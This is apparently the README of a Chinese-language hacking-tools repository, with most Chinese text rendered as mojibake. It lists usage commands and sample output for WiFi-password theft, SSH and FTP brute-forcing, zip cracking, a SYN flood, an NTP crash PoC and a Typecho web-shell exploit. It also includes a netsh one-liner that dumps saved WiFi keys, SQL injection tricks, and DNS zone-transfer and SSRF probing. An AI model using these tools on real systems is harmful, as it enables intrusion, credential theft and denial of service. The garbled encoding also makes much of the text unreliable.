Hacking Tools Demo
Menu
Topic | Description |
---|---|
è¿ç¨å½ä»¤æ§è¡(RCE) | è¿ç¨å½ä»¤æ§è¡(RCE) |
attackWiFi.py | ä¸ä¸ªè·å?wifiå¯ç ?çå·¥å · |
å¾è§£https | å¾è§£https |
å¾è§£HSTS | å¾è§£HSTS |
TcpPortForward.py | 端å?£è½¬å?tool |
typeEchoShell.py | typeEchoShell.php |
wifiå¯ç ? | è·å?ææè¿æ¥è¿çwifiå¯ç ?(Winå¹³å?°) |
zipattack.py | zak.py |
createDict.py | çæ?ä¸ä¸ªç®å?çå¯ç ?ç ´è§£åå ¸ |
PortScan.py | å¤çº¿ç¨ç«¯å?£æ«æ??å¨ |
sshAttack.py | å¤çº¿ç¨sshå¯ç ?æ´åç ´è§£ |
ftpAttack.py | å¤çº¿ç¨ftpå¯ç ?æ´åç ´è§£ |
synFlood.py | synFlood TCP SYN 洪水æ»å» |
ntpdenialservice.py | ä¸ä¸ªä½¿ntpæç»?æ?å¡çpoc代ç ? |
SQL Inject | å享ä¸ä¸ªSQLæ³¨å ¥çæå·§ |
attackSmb/win10.py | ä¸ä¸ªSMBæ¼?æ´çPoc |
badtunnel-poc.rb | badtunnel è·¨ç½æ®µå«æ? |
sqlInjetct.py | ä¸ä¸ªå»¶æ¶æ³¨å ¥çéªè¯? |
SSRF & DNS | SSRFæ¼?æ´ & DNSåä¼ é?æ¼?æ´ |
fpm.py | Nginxï¼IIS7ï¼è§£æ?æ¼?æ´åç? |
morse.py | æ©æ¯å¯ç ?å è§£å¯ |
crawl.py | è½»é?级å¾çç¬è« |
wooyun_index.py | 1000个PHP代ç ?审计æ¡ä¾(2016.7以å?ä¹äºå ¬å¼æ¼?æ´)---å¢å ç´¢å¼ |
proxy_crawl/get_proxy.py & proxy_crawl/ocr_img.py | å??ç¬è«ä»£ç?æ?å¡å¨æå?å®ç° |
éªè¯?ç ?è¯å«v1+HTTPå??è®®Rangeç¹æ§åæ?.pdf | éªè¯?ç ?è¯å«v1+HTTPå??è®®Rangeç¹æ§åæ? |
åºäºæºå¨å¦ä¹ (TensorFlow)çå¤?æ?éªè¯?ç ?è¯å«.pdf | åºäºæºå¨å¦ä¹ (TensorFlow)çå¤?æ?éªè¯?ç ?è¯å« |
Scrapyç¬å?ç«ç¹æ°æ?® | Scrapyç¬å?æ¼?æ´å表 |
ipå°å?ä¹å?¯ä»¥è¿ä¹è¡¨ç¤º.pdf | ipå°å?ä¹å?¯ä»¥è¿ä¹è¡¨ç¤º.pdf |
å ³äºTTLçåæ¶é´.pdf | å ³äºTTLçåæ¶é´.pdf |
为ä»ä¹æ£ç¡®çSQLä¸?è½æ§è¡.pdf | 为ä»ä¹æ£ç¡®çSQLä¸?è½æ§è¡.pdf |
ä»ç¿»å¢å°ä½¿ç¨cloudflareä½ä¸ºè·³æ?¿æ?¥è®¿é®vpsæè ¾åºçå 个é®é¢.pdf | ä»ç¿»å¢å°ä½¿ç¨cloudflareä½ä¸ºè·³æ?¿æ?¥è®¿é®vpsæè ¾åºçå 个é®é¢.pdf |
äºè§£ä¸ä¸golangæ±ç¼.md | äºè§£ä¸ä¸golangæ±ç¼.md |
仿§è¡rediså½ä»¤å¤±è´¥åæ?ä¸ä¸Pipelineï¼TxPipelineï¼Transactionï¼Atomic.pdf | 仿§è¡rediså½ä»¤å¤±è´¥åæ?ä¸ä¸Pipelineï¼TxPipelineï¼Transactionï¼Atomic.pdf |
æ£ç¡®è·å?ipå°å?.md | æ£ç¡®è·å?ipå°å?.md |
è¿ç¨å½ä»¤æ§è¡
Remote Command/Code Execute ç®ç§° RCE
æ¯å¦è¿ç¯æç« ï¼Gogsè¿ç¨å½ä»¤æ§è¡æ¼?æ´åæ? ï¼https://www.anquanke.com/post/id/163575ï¼
å¼å?è
å¨å¤ç?fileåsessionæ¶æªå¤ç?å?±é©åç¬¦é æ?ç®å½ç©¿è¶ã
æ»å»è
éè¿ç®å½ç©¿è¶ï¼ä¼ªé ç管ç?åsessionï¼æ?å伪é 管ç?åç»é,å?å©ç¨Git hookå®ç°ä»»æ?è¿ç¨å½ä»¤æ§è¡ã
è¿å?ªæ¯Gogs项ç®ï¼å 为å
³æ³¨ç人å¤ï¼æä»¥æ?被æ«é²ï¼å®é
åºæ¯ä¸å?¯è½è¿æå¾å¤æ¡æ¶åå¨ç±»ä¼¼æè
ç¸ä¼¼é®é¢ã
æ¯å¦2018å¹´æå¨Beegoä¸ä¹å?ç°äºç±»ä¼¼æ¼?æ´çåå¨ï¼å¹¶å?ä½è
æ??交äºä¸ä¸ªæ¼?æ´ä¿®å¤?çpr (https://github.com/astaxie/beego/pull/3383)
ä½è
ä¹å¾å¿«å°ä¿®å¤?代ç ?å?å¹¶å°äºä¸»åæ¯ã
ä½å¨è¿ä¹é´ï¼å?¦ä¸ä½?å®å
¨ç±å¥½è
éè¿ææ??交çBeegoæ¡æ¶çæ¼?æ´prå?ç°äºæ?弿º?å¨çº¿ææ¡£ç®¡ç?ç³»ç»ä¸å卿¼?æ´ï¼
å?¯ä»¥ç»å½æªææ?ç¨æ·è´¦å?·ãï¼https://github.com/lifei6671/mindoc/issues/384ï¼
è主è¦?åå å¨äºè¿ä¸ªå¼æº?å¨çº¿ææ¡£ç®¡ç?ç³»ç»ä½¿ç¨äºBeegoæ¡æ¶ï¼è彿¶çBeegoæ¡æ¶çæ¬ä¸è¿åå¨ç±»ä¼¼æ¼?æ´å¹¶æ²¡æä¿®å¤?ã
å¨webé¢åçæ¡æ¶å°¤å
¶PHPæå¤ï¼è¿å
¶ä¸è¯å®ä¹æå¾å¤é®é¢ï¼ä»¥å?ç»å½äº§æ?æ¡æ¶æ??è¿ä¸ä¸ªï¼å½æ¶WooYunè¿æ²¡æå
³éï¼
èç°å¨WooYunæä»£è¡¨çç½å¸½æåå?¯è½æ°¸è¿æ¶å¤±å¨äºè?ç½ç浪潮ä¸ã
æäºé®é¢å
¶å®æ¯ä¸ä¸ªå°?çå®å
¨é®é¢ï¼å
¶æ¬èº«å?¯è½å¹¶æ²¡æä»ä¹ç¹å«é«æ·±çææ¯å?«é?ï¼ä½ææå°?çå®å
¨é®é¢ç»å?èµ·æ?¥å°±å?¯ä»¥å?æ?ä¸ä¸ªå¤§çå®å
¨é®é¢ã
类似é®é¢æå¾å¤ï¼ä¸»è¦?æ¯è?ç¦å¼å?çå¾å¾å
³æ³¨å®å
¨å¾å°ï¼å?ªæå
³æ³¨ç人足å¤å¤äºæè
æä¹?äºå享ç人æè
ææ¨å¨è¿äºè¢«å
¬å¼çå¨åï¼
é£äºæ½å¨çæ¼?æ´æ?æå?¯è½è¢«é?æ¸?æ«é²ã
attackWiFi.py ä¸ä¸ªè·å?wifiå¯ç ?çå·¥å ·
ç ´è§£åç?ï¼
ç ´è§£wifiä¸è½é¥åçæ¥å?£å??è®®ï¼é?æå
æ´åç ´è§£ï¼wifiä¸è½é¥åçæ?å¡ç«¯åå¨äºå¤§é?çwifiå¯ç ?ç¸å
³ä¿¡æ?¯
éè¿å?æ¥å?£æ??ä¾ssidåbssidä¿¡æ?¯ï¼è·å?çå®çwifiå¯ç ?
è¿éè¦?æè°¢zke1ev3néå?äºwifiä¸è½é¥åçå®å?客æ·ç«¯
æ¬èæ¬å®åäºç ´è§£ç¨åº?ï¼å¢å äºå®¹éæºå¶ï¼è·å¾çå¯ç ?å¨responseä¸å
¶å®æ¯urlencodeçï¼æ¬èæ¬ä¹å¢å äºdecodeè§£ç ?
æ¥ç帮å©
â Hacking git:(master) â py attackWiFi.py -h
Usage: use:
--ssid <wifi ssid> --bssid <wifi bssid>
Example: python attackWiFi.py --ssid ssid --bssid bssid
Options:
-h, --help show this help message and exit
--ssid=WIFI_SSID the wifi ssid info
--bssid=WIFI_BSSID the wifi bssid info
ç¬¬ä¸æ¥æ¯è¦?è·å¾wifiçssidåbssidä¿¡æ?¯ï¼ææ¼ç¤ºçç¯å¢æ¯Macç¯å¢ï¼å
¶ä»ç¯å¢è¯·èªè¡å¯»æ¾ä¸è·å?ssidåbssidçå·¥å
·
Macç¯å¢ï¼
æ§è¡ï¼airport -s è·å?ææwifiç¸å
³ä¿¡æ?¯ï¼è¿éé¨åä¿¡æ?¯è¿è¡äºæç ?ï¼
Macä¸é»è®¤airport -s æ¯ä¸?è¡çï¼å 为æå¨æ§è¡ä¹å?建è¿ä¸ä¸ªè½¯é¾æ¥ï¼
ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
å
¶ä»æ?ä½ç³»ç»è·å?æ¹å¼?å?¯èªè¡Google
ä¸ä¸æ¥è·å¾äºssidåbssidä¿¡æ?¯
æ§è¡è·å?å¯ç ?ï¼
python attackWiFi.py --ssid xxx --bssid ****
xxx 表示wifiçå??ç§°ï¼æ¯å¦wifiå??å?«ï¼home
**** 表示wifiçbssidä¿¡æ?¯ï¼æ¯å¦ 17:71:94:14:84:0d (é?便åç)
é£ä¹è·å?å¯ç ?å°±æ¯ï¼
python attackWiFi.py --ssid home --bssid 17:71:94:14:84:0d
æ?åäºä¼æ¾ç¤ºpassword is: xxxxxxx
乿å?¯è½ä¼å¤±è´¥ï¼è²ä¼¼æ?å¡ç«¯æ¯æcheckçï¼æ?ä½å¤äºï¼ä¼è·å?失败ï¼è¿ä¸ªæ¶åå?¯ä»¥æ?¢ä¸ä¸ªç½ç»ç¯å¢æµè¯ï¼æè
æ?¢ä¸ä¸ªwifiæµè¯
å¾è§£https
ç½ä¸å¤§é¨åå
³äºhttpsç讲解å?å¼?å?æ ·ï¼ä¹ä¸?æäºç?è§£ãäºæ¯èªå·±æ»ç»ç»äºä¸ªå¾ï¼å¦æéè¯¯æ¬¢è¿æ¹è¯ææ£
1.[server] çæ?é
?对çå
¬é¥åç§?é¥ï¼Pub,Pri
2.[server] æ?å¡å¨å°âPubâ?ä¼ ç»å®¢æ·ç«¯
3.[Client] çæ?对称ç§é¥("key2"),ç¶å?ç¨key2å å¯ä¿¡æ?¯
4.[Client] 使ç¨âPubâ?å å¯âkey2â?ãå 为å?ªææ?å¡å¨ç¥é?âPriâ?,æä»¥âkey2â?æ¯å®å
¨ç
5.[Client] send(å å¯å?çæ°æ?®)å(å å¯çå?çkey2)ç»æ?å¡å¨
6.[Server] ç¨ç§?é¥âPriâ?è§£å¯è¿ä¸ªresult_twoï¼æ¿å°âkey2â?
7.[Server]ç¨âkey2â?è§£å¯å å¯å?çæ°æ?®result_oneãæ°æ?®å®å
¨çå°è¾¾æ?¥äºæ?å¡å¨ã
æ»ç»:è§£å¯result_oneç¨çkey2éç¨å¯¹ç§°å å¯,èå
¬é¥åç§?é¥ççæ?åéç¨é?对称å å¯,
æä»¥ä¸ä¸ªå®æ´çhttpsæµ?ç¨åºè¯¥æ¯æ¢å
å?«äºå¯¹ç§°å å¯ä¹å
å?«äºé?对称å å¯.
å¾è§£HSTS
HSTSä¸å®æ¯å®å
¨ççå?ï¼å©ä½ æ·±å
¥ç?è§£HSTSçå¾ã
TcpPortForward.py 端å?£è½¬å?tool
使ç¨åºæ¯:
ä¸ï¼
Aæ?å¡å¨å¨å
ç½ï¼å
¬ç½æ æ³ç´æ¥è®¿é®è¿å?°æ?å¡å¨ï¼ä½æ¯Aæ?å¡å¨å?¯ä»¥è?ç½è®¿é®å
¬ç½çBæ?å¡å¨ï¼å?设IP为222.2.2.2ï¼ã
æä»¬ä¹å?¯ä»¥è®¿é®å
¬ç½çBæ?å¡å¨ãæä»¬çç®æ æ¯è®¿é®Aæ?å¡å¨ç22端å?£ãé£ä¹å?¯ä»¥è¿æ ·ï¼
1. å¨Bæ?å¡å¨ä¸è¿?è¡ï¼
./TcpPortForward.py l:10001 l:10002
è¡¨ç¤ºå¨æ¬å°çå?¬äº10001ä¸10002两个端å?£ï¼è¿æ ·ï¼è¿ä¸¤ä¸ªç«¯å?£å°±å?¯ä»¥äºç¸ä¼ è¾æ°æ?®äºã
2. å¨Aæ?å¡å¨ä¸è¿?è¡ï¼
./TcpPortForward.py c:localhost:22 c:222.2.2.2:10001
è¡¨ç¤ºè¿æ¥æ¬å°ç22端å?£ä¸Bæ?å¡å¨ç10001端å?£ï¼è¿ä¸¤ä¸ªç«¯å?£ä¹å?¯ä»¥äºç¸ä¼ è¾æ°æ?®äºã
3. ç¶å?æä»¬å°±å?¯ä»¥è¿æ ·æ?¥è®¿é®Aæ?å¡å¨ç22端å?£äºï¼
ssh 222.2.2.2 -p 10002
åç?å¾ç®å?ï¼è¿ä¸ªå½ä»¤æ§è¡å?ï¼Bæ?å¡å¨ç10002端å?£æ¥æ¶å°ç任使°æ?®é½ä¼ä¼ ç»10001端å?£ï¼æ¤æ¶ï¼Aæ?å¡å¨æ¯è¿æ¥äºBæ?å¡å¨ç10001端å?£çï¼
æ°æ?®å°±ä¼ä¼ ç»Aæ?å¡å¨ï¼æç»è¿å
¥Aæ?å¡å¨ç22端å?£ã
äºï¼
ä¸?ç¨æ´å¤ä¸¾ä¾äºï¼TcpPortForward.pyçlä¸c两个å?æ°å?¯ä»¥è¿è¡ç?µæ´»ç两两ç»å?ï¼å¤å?°æ?å¡å¨ä¹é´å?ªè¦?æ?æç½æ°æ?®æµ?æ¹å?ï¼é£ä¹å°±è½æ»¡è¶³å¾å¤åºæ¯çéæ±ã
collect from phithon
typeEcho get Shell , typeEchoå??åº?ååæ¼?æ´å©ç¨
typeEchoShell.php 为çæ?shellçå
容ï¼ç»?è¿base64å?åº?ååçå¼ï¼å?ç¨äºtypeEchoShell.pyä¸çcookieä¸é¡¹
typeEchoShell.py è·å?ç®æ ç«ç¹shell
ä¾ï¼python typeEchoShell.py -u http://www.xxx.com
è¥è¦?èªå®ä¹shellå
容ï¼å?¯æ´æ¹typeEchoShell.phpï¼èªå®ä¹shellå
容
è·å?ææè¿æ¥è¿çwifiå¯ç ?(Winå¹³å?°)
éè¦?管ç?åæ?é?
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
zipattack.py | zak.py zipå 坿件æ´åç ´è§£
帮å©è¯´æï¼ python zipattack.py -h
æµè¯ï¼
zip test.zip *.gif -e
è¿è¡æ´åç ´è§£ï¼
python zipattack.py -f test.zip -d password.txt
第äºä¸ªèæ¬ï¼zak.py æ¯æ é?穷举
python zak.py -h
Usage: usage -f <zipfile> -t <type> -l <length> or -h get help
Options:
-h, --help show this help message and exit
-f ZNAME specifyzip file
-t TNAME specify type(num|a|A|aA|anum|numa|Anum|aAnum)
-l LENGTH specify length,default=8
ä¾ï¼
python zak.py -f test.zip -t num -l 12
表示以æ°åç±»åï¼é¿åº¦æé¿ä¸º12çå¯ç ?æä¸¾test.zipæä»¶
createDict.py çæ?ä¸ä¸ªç®å?çå¯ç ?ç ´è§£åå ¸
python createDict.py
æctrl+c å?æ¢çæ?
PortScan.py å¤çº¿ç¨ç«¯å?£æ«æ??å¨
More Help: PortScan.py -h
æµè¯:
python PortScan.py -H www.baidu.com -p 80 443 110
â py python PortScan.py -H www.baidu.com -p 80 443 110
[+] Scan Results for: 119.75.218.70
Scanning port 443
Scanning port 110
Scanning port 80
[+]443/tcp open
[+] HTTP/1.1 302 Moved Temporarily
Server: bfe/1.0.8.18
Date: Sun, 06 Nov 2016 08:43:40 GMT
Content-T
[-]110/tcp closed
[-]80/tcp closed
Also, You can local test , The python script support domain or ip mode
Example:
python PortScan.py -H 127.0.0.1 -p 80
sshAttack.py å¤çº¿ç¨sshå¯ç ?æ´åç ´è§£
æµè¯ï¼
â py python sshAttack.py -h
Usage: -H <target host> -u <user> -f <password list>
Options:
-h, --help show this help message and exit
-H TGTHOST specify target host
-f PASSWDFILE specify password file
-u USER specify the user
-c COUNT specify the max ssh connect count , default 5
py python sshAttack.py -H 192.168.2.201 -u test -f /Users/lock/1.txt -c 20
-c ç¨æ·æµè¯æå®ssh龿¥æ°ï¼å
·ä½æ ¹æ?®ssh config æä»¶å¤æ
ä¾ï¼
â py python sshAttack.py -H 192.168.1.100 -u root -f password.md -c 20
[-] Testing: 1111
[-] Testing: 2222
[-] Testing: 3333
[-] Testing: 111111
[-] Testing: 123123
[-] Testing: 123456
[+] Good , Key Found: 123456
ftpAttack.py å¤çº¿ç¨ftpå¯ç ?æ´åç ´è§£
æµè¯ï¼
â py python ftpAttack.py -h
Usage: -H <target host> -f <password list>
Options:
-h, --help show this help message and exit
-H TGTHOST specify target host
-f PASSWDFILE specify password file,like username:password format file
-d DELAY attack time delay set default 1s
â py python ftpAttack.py -H 127.0.0.1 -f userpass.md -d 1
[-] 127.0.0.1 FTP Anonymous Logon Failed.
[+] Trying: root/aaa
[-] Could not brute force FTP credentials.
[+] Trying: lock/mmm
[-] Could not brute force FTP credentials.
[+] Trying: alice/123
[-] Could not brute force FTP credentials.
The default test delay time is 0s , test default account is anonymous , if success, will show user name and password.
userpass.md is username and password file,the file format like below:
root:123
hello:456
alice:789
test:12345
synFlood.py ä¸ä¸ªç®å?ç TCP SYN 洪水æ»å» pythonç
More Detail:
python synFlood.py -h
1,ç¨ Scapy ç®å?çå¤?å¶ä¸ä¸ª TCP SYN 洪水æ»å»ï¼å°å¶ä½ä¸äº IP æ°æ?®å
, TCP 513 ç®æ 端å?£ã
2,è¿?è¡æ»å»å?é? TCP SYN æ°æ?®å
èå°½ç®æ 主æºèµæº?ï¼å¡«æ»¡å®çè¿æ¥éåï¼åºæ¬ç« çªç®æ å?é? TCP é?ç½®å
çè½åã
3,netstat -an 大é?çå?龿¥ç¶æ? SYN_RECV
å?¯è½éè¦?çä¾?èµï¼
brew install --with-python libdnet
pip install scapy
pip install pcapy
pip install pydumbnet
æ§è¡ææ:
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
....
ntpDenialService.py ä¸ä¸ªä½¿ntpæç»?æ?å¡çpoc代ç ?
æé ä¸ä¸ªç¹æ®çæ°æ?®å
ï¼ntpd没æé»è®¤å¼å?¯trapæ?å¡ï¼å¦ætrap被å¼å?¯ï¼æ»å»è
å°±è½éè¿ç¹å«æé çæ°æ?®å
导è´ç©ºæéå¼ã?ntpdå´©æºï¼è¿èå¯¼è´æ?å¡å¨æç»?æ?å¡ã
æµè¯ï¼
çå?¬æ¬å°udp 1111 端å?£
â ~ nc -l -u 0 1111
æ§è¡ï¼
â Hacking git:(master) â python ntpDenialService.py 127.0.0.1 1111
[-] Sending payload to 127.0.0.1:1111 ...
[+] Done!
â ~ nc -l -u 0 1111
6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP
æ¥å?å°è¿ä¸ªç¹æ®çæ°æ?®å
ï¼ntpdå´©æºï¼å½¢æ?æç»?æ?å¡
å享ä¸ä¸ªSQLæ³¨å ¥çæå·§
å®¡è®¡å¼æº?æ¡æ¶/cmsçæ¶åå?¯è½ä¼é?å°ä¸äºææ?æ?çæ³¨å
¥æ¼?æ´
å½ä»¥pdoçæ¹å¼?è¿æ¥mysqlï¼ä¹å°±æ¯è¯´å?¯ä»¥å¤è¯å?¥æ§è¡çæ¶å
ç¶å?ï¼å?èå¦ä¸ï¼
python:
import binascii
s='select * from x limit 1;'
print binascii.b2a_hex(s)
# è·å¾16è¿å¶æ°æ?®ï¼73656c656374202a2066726f6d2078206c696d697420313b
mysql -uroot
set @a:=0x73656c656374202a2066726f6d2078206c696d697420313b;
prepare s from @a;
execute s;
mysql root@localhost:test> execute s;
+------+----------+-------+
| id | is_reg | pid |
|------+----------+-------|
| 1 | 1 | 0 |
+------+----------+-------+
1 row in set
Time: 0.002s
attackSmb/win10.py ä¸ä¸ªSMBæ¼?æ´çPoc代ç ?
æ¤æ¼?æ´ä¸»è¦?å½±å?Windows Server 2012/2016ã?Win8/8.1以å?Win10ç³»ç»ã
æ»å»è
å?¯ä»¥æ¨¡ææ?ä¸ä¸ªSMBæ?å¡å¨ï¼è¯±ä½¿å®¢æ·ç«¯å?èµ·SMBè¯·æ±æ?¥è§¦å?æ¼?æ´ã
æ»å»è
ä¹å?¯ä»¥éè¿ä¸é´äººæ¹å¼?âæ¯åâ?SMBååºï¼æ?å
¥æ?¶æ?çSMBåå¤?å®ç°æç»?æ?塿æ§å¶å?害系ç»ã
badtunnel-poc.rb badtunnel è·¨ç½æ®µå«æ?
detail:
badtunnel-poc.rb
sqlInjetct.py ä¸ä¸ªå»¶æ¶æ³¨å ¥çéªè¯?
æ ¹æ?®è¿åçæ¶é´å·®æ?¥çæµæ³¨å
¥çç»ææ¯å?¦æ£ç¡®(æ è§ä»£ç ?å¾ç)
帮å©ï¼
â Hacking git:(master) â py sqlInjetct.py
-----Usage:-----
Example:
python sqlInject.py -u http://xxx.xxx.com/id=123
å ³äºSSRFæ¼?æ´ ä¸ DNSåä¼ é?æ¼?æ´
SSRFæ¾å¤§ä»¥å?è¿æ¯å??åå?±é©çï¼å½å©ç¨SSRFåºæ¢å
ç½çæ¶åï¼ç»å?dict伪å??è®®å?å©ç¨ftpå??è®®åºæ¢æ?个ipæ¯å?¦åæ´».
ä¸è¬æ
åµä¸å¦æå?¯ä»¥å¨æ?çæ¶é´å
å¾å°responseé£ä¹åºæ¬å?¯ä»¥å¤å®è¯¥ipåæ´»ï¼å??ä¹ä¸?åå¨è¯¥ipã
è¿ä¸ªæå·§ä¹æ¯æ¶éè¿æ?¥çï¼è³äºä¸ºä»ä¹åºè¯¥æ¯åftpå??è®®æ¬èº«æå
³?
è·å¾ä¸å¹
å
ç½è?å¾SSRFæ¯ä¸ä¸ªä¸?éçéæ©ã
å¦ä½å¤æSSRFï¼
1,SSRFæ¯ç±æ?å¡ç«¯å?èµ·ç请æ±ï¼å æ¤å¨å è½½å¾ççæ¶åï¼æ¯ç±æ?å¡ç«¯å?èµ·çã
2,卿们æ¬å°æµ?è§å¨ç请æ±ä¸å°±ä¸?åºè¯¥åå¨å¾çç请æ±ï¼å¦ææå
å?¯ä»¥ç«å?³çå°ææã
DNSåä¼ é?æ¼?æ´ï¼
主åæ?å¡å¨Aï¼å¤åæ?å¡å¨B,
Aï¼Bä¹é´éè¦?å¤ä»½ç¸å
³çåå??ï¼ip对åºä¿¡æ?¯,
ååä¸å?ªæBå?¯ä»¥å»å?æ¥Aä¿¡æ?¯å°èªå·±çæ°æ?®åºä¸ã使¯ç±äºé
?ç½®é误,
导è´ä»»æ?客æ·ç«¯å?主åå?起请æ±,主åé½ä¼æç¸å
³ä¿¡æ?¯è¿åç»å®¢æ·ç«¯,å
é¨ç½ç»è?å¾è¢«è½»æ?¾æ³é²ã
dig soa xxx.com
å¾å°ANSWER SECTION:å?设为ï¼
ns3.dnsv4.com
æ¥çæ¯å?¦æåä¼ é?è¿åï¼
dig axfr xxx.com @ns3.dnsv4.com
æè¿å就表示æ¼?æ´åå¨
使ç¨Pythonæé ä¸ä¸ªfastcgiå??议请æ±å 容å?é?ç»php-fpm , Nginxï¼IIS7ï¼è§£æ?æ¼?æ´åç?
æ¥ç帮å©ï¼
python fpm.py -h
è¿ç¯æç« åçä¸?éï¼äºæ¯æ¶éäºè¿æ?¥ï¼
https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html
ç®è¿°å¦ä¸ï¼
NginxåIIS7æ¾ç»?åºç°è¿ä¸ä¸ªPHPç¸å
³çè§£æ?æ¼?æ´ï¼æµè¯ç¯å¢https://github.com/phith0n/vulhub/tree/master/nginx_parsing_vulnerabilityï¼.
该æ¼?æ´ç°è±¡æ¯ï¼å¨ç¨æ·è®¿é®http://127.0.0.1/favicon.ico/.phpæ¶ï¼è®¿é®å°çæä»¶æ¯favicon.icoï¼ä½å?´æç
§.phpå?ç¼è§£æ?äºã
ç¨æ·è¯·æ±http://127.0.0.1/favicon.ico/.phpï¼nginxå°ä¼å?é?å¦ä¸ç¯å¢å?é?å°fpméï¼
{
...
'SCRIPT_FILENAME': '/var/www/html/favicon.ico/.php',
'SCRIPT_NAME': '/favicon.ico/.php',
'REQUEST_URI': '/favicon.ico/.php',
'DOCUMENT_ROOT': '/var/www/html',
...
}
æ£å¸¸æ?¥è¯´:
SCRIPT_FILENAMEç弿¯ä¸ä¸ªä¸?åå¨çæä»¶/var/www/html/favicon.ico/.phpï¼
æ¯PHP设置ä¸çä¸ä¸ªé项fix_pathinfo导è´äºè¿ä¸ªæ¼?æ´ã
PHPä¸ºäºæ¯æ?Path Info模å¼?èåé äºfix_pathinfoï¼å¨è¿ä¸ªé项被æå¼çæ
åµä¸ï¼
fpmä¼å¤æSCRIPT_FILENAMEæ¯å?¦åå¨ï¼å¦æä¸?åå¨å廿æå?ä¸ä¸ª/å?以å?çææå
容ï¼
å?æ¬¡å¤ææä»¶æ¯å?¦åå¨ï¼å¾æ¬¡å¾ªç¯ï¼ç´å°æä»¶åå¨ã
æä»¥ï¼ç¬¬ä¸æ¬¡fpmå?ç°/var/www/html/favicon.ico/.phpä¸?åå¨ï¼å廿/.phpï¼å?夿/var/www/html/favicon.icoæ¯å?¦åå¨ã
æ¾ç¶è¿ä¸ªæä»¶æ¯åå¨çï¼äºæ¯è¢«ä½ä¸ºPHPæä»¶æ§è¡ï¼å¯¼è´è§£æ?æ¼?æ´ã
æ£ç¡®çè§£å³æ¹æ³æä¸¤ç§?ï¼
ä¸ï¼å¨Nginx端使ç¨fastcgi_split_path_infoå°path infoä¿¡æ?¯å»é¤å?ï¼ç¨tryfiles夿æä»¶æ¯å?¦åå¨ï¼
äºï¼åå©PHP-FPMçsecurity.limit_extensionsé
?置项ï¼é?¿å
?å
¶ä»å?ç¼æä»¶è¢«è§£æ?ã
morse.py æ©æ¯å¯ç ?å è§£å¯
æ©æ¯å¯ç ?æ¯ç±ç¾å½çä¸ç¼ªæ©æ¯å?æçä¸å¥å å¯ç®æ³ï¼æ¯ä¸ç§?ææç»ç»çä¿¡å?·ä»£ç ?ã
å å¯ï¼
â ~ python morse.py -e lock
.-.. --- -.-. -.-
è§£å¯:
â ~ python morse.py -d '.-.. --- -.-. -.-'
lock
â ~
æ¥ç帮å©:
â ~ python morse.py
usage -e|-d msg or -h get help
crawl.py è½»é?级å¾çç¬è«
ä¿®æ¹crawl.pyä¸:
URL = "https://www.xxx.top" # è¦?ç¬å?çç½ç«
# ç¬å?çURLåå??èå´
URL_RULE = [
'https://www.xxx.top',
'https://xxx.top',
'http://www.xxx.top',
'http://xxx.top'
]
æ§è¡ç¬è«ï¼
python crawl.py
wooyun_index.py 1000个PHP代ç ?审计æ¡ä¾(2016.7以å?ä¹äºå ¬å¼æ¼?æ´)---å¢å ç´¢å¼
git clone [email protected]:Xyntax/1000php.git
é»è®¤æ¯æ²¡æç´¢å¼çï¼æä»¥æ¥çæ¼?æ´å??åä¸?æ¹ä¾¿
1ï¼cd 1000php
2ï¼æ§è¡ä¸è½½æçèæ¬ï¼wget https://raw.githubusercontent.com/LockGit/Hacking/master/wooyun_index.py -O wooyun_index.py
3ï¼æ§è¡ï¼mkdir css && mkdir js
4ï¼æ§è¡ï¼wget https://github.com/LockGit/Hacking/raw/master/res/style.css -O style.css -P css/
5ï¼æ§è¡ï¼wget https://github.com/LockGit/Hacking/raw/master/res/jquery-1.4.2.min.js -O jquery-1.4.2.min.js -P js/
6ï¼æ§è¡ï¼python wooyun_index.py ä¼çæ?æ¼?æ´ç´¢å¼åè¡¨ï¼æ¤æ¶ä¼çæ?index.htmlæä»¶ï¼æå¼è¿ä¸ªæä»¶å?³å?¯
ææå¦ä¸ï¼
proxy_crawl/get_proxy.py | ocr_img.py å??ç¬è«ä»£ç?æ?å¡å¨æå?å®ç°æ¹å¼?
访é®ï¼http://www.goubanjia.com/free/index.shtml å?¯çå°è¯¥ç½ç«æ??ä¾äºå¾å¤ä»£ç?æ?å¡å¨
使¯æ ¸å¿ç代ç?ipä¿¡æ?¯éç¨äºå??ç¬è«çç¥
å?¯ä»¥çä¸pageç»æå¦ä¸é?¢å¾çæ??è¿°,åè¿ç¬è«çå?å¦ç¥é?è¿æ¯ææ?æ··æ·é¡µé?¢ç»æ,让ç¬è«æ æ³æå?å°æ£ç¡®ä¿¡æ?¯ï¼ä»èå¨ä¸å®ç¨åº¦ä¸èµ·å°ä¿?æ¤ä½ç¨ã
åäº2个pyæä»¶è¿è¡äºä¸ä¸ªå°?æµè¯ï¼æ¯ä¸ä¸ªç®å?å®ç°,代ç ?å¨ä»åºproxy_crawlç®å½ä¸ï¼
没æä»ä¹é«æ·±çææ¯å?«é?
æ ¸å¿åç?æ¯éè¿seleniumå¤échromeæå¼å¾
æå?页é?¢ï¼ç¶å?ç¨åº?èªå¨å¯¹æ¯?ä¸é¡µå
容è¿è¡æªå¾ï¼ä¿?åå¨proxy_crawl/imgä¸é?¢(å¦ä¸å¾)
ä¹å?éè¿pytesseract对æå?å°çå¾çè¿è¡è¯å«ï¼ç´æ¥æ è§å?端页é?¢çæ··æ·
pytesseract模å?å?¯ä»¥å°?è¯ä¸ï¼å½å¤è¿æå¤§ç¥ç¨jså®ç°äºè¿ä¸ªæ¨¡å?ï¼æ¯æ?62ç§?è¯è¨æµ?è§å¨ç«¯çè¯å«ï¼å½ç¶ï¼ä¹æ¯éè¦?æ¨¡åæ°æ?®æ¯æ?ç
ä¸è¬è¿å?¯ä»¥è¯å«ä¸ä¸ç®å?çéªè¯?ç ?ï¼ä½æ¯å¤?æ?çä¸?è¡ï¼å¤ªè¿å¤?æ?çå?¯è½éè¦?æ¯å¦tensorflow+cnnï¼ç½ä¸ä¹ææ¡ä¾
æ¸
æ´æ°æ?®å¹¶è®°å½å°proxy_crawl/proxy.mdæä»¶ä¸
